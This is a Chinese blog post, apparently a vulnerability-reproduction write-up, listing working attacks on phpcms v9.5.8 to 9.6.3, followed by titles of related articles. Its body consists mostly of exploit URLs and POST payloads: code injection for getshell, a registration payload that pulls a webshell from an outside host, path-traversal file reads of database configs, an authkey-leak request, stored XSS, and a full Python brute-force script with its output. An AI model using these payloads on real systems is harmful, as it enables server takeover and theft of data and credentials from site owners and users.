phpcms的漏洞復現

原創 加油努力拉屎放屁 2020-07-03 08:14

phpcmsV9.5.8後臺getshell:

payload:http://127.0.0.1/index.php?m=content&c=content&a=public_categorys&menuid=${@phpinfo()}

分析文章:https://www.mrwu.red/web/2723.html

phpcms v9.6.0 任意用戶密碼重置:

分析文章:https://www.cnblogs.com/yangxiaodi/p/6890298.html

phpcmsV9.6.0前臺getshell:

訪問URL:

http://127.0.0.1.com/index.php?m=member&c=index&a=register&siteid=1]www.xxx.com/index.php?m=member&c=index&a=register&siteid=

POST數據:

siteid=1&modelid=11&username=123456&password=123456&[email protected]&info[content]=<img src=http://files.hackersb.cn/webshell/antSword-shells/php_assert.php#.jpg>&dosubmit=1&protocol=

webshell地址:頁面會出現的~

分析文章:https://xz.aliyun.com/t/5730

phpcmsV9.6.0數據庫備份爆破:

利用代碼如下:

#!/usr/bin/env python
# coding=utf-8
'''/*
    * author = Mochazz
    * team   = 紅日安全團隊
    * env    = pyton3
    *
    */
'''
import requests
import itertools
characters = "abcdefghjklmnopqrstuvwxyz0123456789_!#"
backup_sql = ""
payload = "/api.php?op=creatimg&txt=mochazz&font=/../../../../caches/bakup/default/{location}<<"
url = "http://127.0.0.1"
flag = 0
for num in range(1, 7):
    if flag:
        break
    for pre in itertools.permutations(characters, num):
        pre = ''.join(list(pre))
        payload = payload.format(location=pre)
        r = requests.get(url+payload)
        if r.status_code == 200 and "PNG" in r.text:
            flag = 1
            backup_sql = pre
            payload = "/api.php?op=creatimg&txt=mochazz&font=/../../../../caches/bakup/default/{location}<<"
            break
        else:
            payload = "/api.php?op=creatimg&txt=mochazz&font=/../../../../caches/bakup/default/{location}<<"
print("[+] 前綴爲:", backup_sql)
flag = 0
for i in range(30):
    if flag:
        break
    for ch in characters:
        if ch == characters[-1]:
            flag = 1
            break
        payload = payload.format(location=backup_sql+ch)
        r = requests.get(url + payload)
        if r.status_code == 200 and "PNG" in r.text:
            backup_sql += ch
            print("[+] ", backup_sql)
            payload = "/api.php?op=creatimg&txt=mochazz&font=/../../../../caches/bakup/default/{location}<<"
            break
        else:
            payload = "/api.php?op=creatimg&txt=mochazz&font=/../../../../caches/bakup/default/{location}<<"

print("備份sql文件地址爲:", backup_sql+".sql")

結果爲

C:\Users\dell\Desktop>python Zxc.py
[+] 前綴爲: 1
[+]  12
[+]  123
[+]  1231
[+]  12312
[+]  123123
[+]  1231231
[+]  12312312
[+]  123123123
備份sql文件地址爲: 123123123.sql

分析文章:

phpcmsV9.6.0 authkey泄露導致注入:

http://127.0.0.1/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin

在這裏插入圖片描述

phpcmsV9.6.1 任意文件讀取:

分析文章:https://xz.aliyun.com/t/5731

phpcmsV9.6.2 前臺SQL注入:

分析文章:https://xz.aliyun.com/t/5731

phpcmsV9.6.3 存儲型XSS:

利用方法,先註冊一個帳號,然後登錄,然後訪問:

http://127.0.0.1/index.php?m=member&c=index&a=change_credit&

post:

dosubmit=1&fromvalue=0.6&from=1id=1`setset'&to=}" onmousemove=alert(1)>//

分析文章:https://xz.aliyun.com/t/1860

phpcmsV9.6.3文件包含:

http://127.0.0.1.com/m=search&a=public_get_suggest_keyword&q=../../phpsso_server/caches/configs/database.php

如果存在漏洞即可成功讀取到phpcms的數據庫配置文件

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

phpstudy php_xmlrpc.dll後門漏洞復現

搭建環境: phpstudy2018 php版本5.4 漏洞影響版本:5.2/5.4 漏洞利用 1、隨便訪問一個存在的php文件 我這裏就訪問index.php好了 2、進行index.php 進行抓包 再自行添加兩個字段payl

加油努力拉屎放屁 2020-07-03 08:14:49

weblogic漏洞從0學習復現

這兩天慢慢復現完weblogic的漏洞 weblogic的歷史漏洞 #控制檯路徑泄露 Weakpassword #SSRF: CVE-2014-4210 #JAVA反序列化: CVE-2015-4852:Webl

加油努力拉屎放屁 2020-07-03 08:14:49

從任意文件下載漏洞到拿下多臺內網服務器權限

文章涉密部分,會進行大量打碼,敬請諒解 一、從一個任意文件下載漏洞說起 客戶內網系統中有一個系統上線前例行安全檢測。 我接到單子之後開始整活~ 打開系統,首先看看有沒有上傳點,興沖沖找了一圈,失望而歸。不過好歹有一個文件下載的

nini_boom 2020-07-02 10:27:46

phpMyAdmin跨站點請求僞造漏洞

CVE-2019-12922 phpMyAdmin 4.9.0.1-跨站請求僞造漏洞復現 0X01 漏洞概述 安全研究人員Manuel Garcia Cardenas近日公佈了最常用的管理MySQL和MariaDB數據庫的應用程

tdcoming 2020-06-30 05:42:46

[漏洞復現]Apache Solr Velocity模板遠程代碼執行

Apache Solr Velocity模板遠程代碼執行 0X00 漏洞描述 近日,國外安全研究員s00py公開了一個Apache Solr的Velocity模板注入的漏洞.該漏洞可以攻擊最新版本的Solr.目前該漏洞利用詳情已

tdcoming 2020-06-30 05:42:46

蹭熱度分享一份寫配置漏洞案例

文章目錄0x00 前言0x01 分析0x02 利用0x03 結語 0x00 前言 今天奇安信ATEAM團隊分享一篇深度好文這是一篇“不一樣”的真實滲透測試案例分析文章引爆朋友圈多次轉發分享,Phith0n 師傅也專門寫了一篇經典寫

Ca3tie1 2020-06-27 03:17:43

如何從Exploit-DB中添加模塊至Metasploit

如何從Exploit-DB中添加模塊至Metasploit前言1、搜索漏洞信息2、使用searchsploit進行本地搜索3、複製rb文件4、use載入模塊 前言 系統:Linux kali 5.2.0-kali2-amd64 #

夜会美丶 2020-06-26 21:11:33

linux -shell注入_白名單繞過

在靶機中遇到一個shell注入的腳本過段時間會有該靶機的博客發出 因爲暫時不能發出 什麼是OS 命令注入—— 操作系統命令注入(也稱爲shell注入)是一個Web安全漏洞,允許攻擊者在運行應用程序的服務器上執行任意操作系統(OS)命令,並

河里一只虾 2020-06-17 15:19:23

Microsoft Office公式編輯器(CVE-2017-11882)漏洞分析報告

文章目錄0x01 漏洞環境0x02 漏洞成因0x03 影響漏洞版本0x04 分析過程漏洞溢出點動態分析0x05 利用過程彈出網頁msf配置攻擊方和被攻擊方進行通訊攻擊pc445端口0x06 生成攻擊文件msf開始攻擊0x07 結果

东方二狗 2020-06-16 02:26:51

KERNEL POOL LIST ENTRY OVERWRITE ATTACK

KERNEL POOL LISTENTRY OVERWRITE ATTACK     LIST_ENTRY OVERWRITE 原理圖   測試代碼: Sys: VOID Nopagepool_ListEntry_Overwrite(

instruder 2020-06-15 07:52:19

MySQL報錯注入函數彙總

常用函數   字符串連接函數,將多個字符串連接成一個字符串,當中間字符串有一個爲空時,最後結果也爲空 concat(str1, str2, str3 ,...)   concat_ws('指定分隔符', str1,str2,str3.

Au.J 2020-06-09 09:44:04

S2-001本地復現與分析

環境搭建:win10   eclipes ee    struts2.0.1   tomcat8 導入最基礎的jar包 web.xml <?xml version="1.0" encoding="UTF-8"?> <web-app x

Au.J 2020-06-09 09:43:54

S2-045本地復現與分析

環境搭建:win10   eclipes ee    struts2.3.20   tomcat8 搭建好的環境: 鏈接:https://pan.baidu.com/s/1mChEMcWRlKALdu9Ikce8OQ  提取碼:uisj 

Au.J 2020-06-09 09:43:54

Apache Tomcat CVE-2019-0232 遠程代碼執行漏洞

漏洞簡介2019年4月10日,Apache Tomcat報告了一個漏洞,報告中稱在windows上運行的Apache Tomcat存在遠程代碼執行漏洞,漏洞編號爲CVE-2019-0232。在Windows平臺,遠程攻擊者向CG

tdcoming 2020-06-09 03:13:40

OXID eShop 6.x ~ 6.3.4 版本SQL注入漏洞到命令執行漏洞在線實驗

來源:https://www.vulnspy.com/en-oxid-eshop-6.x-sqli-to-rce/ 實驗地址:https://www.vsplate.com/?github=vsplate/dcenvs/tree/mast

Ambulong 2020-06-08 17:32:21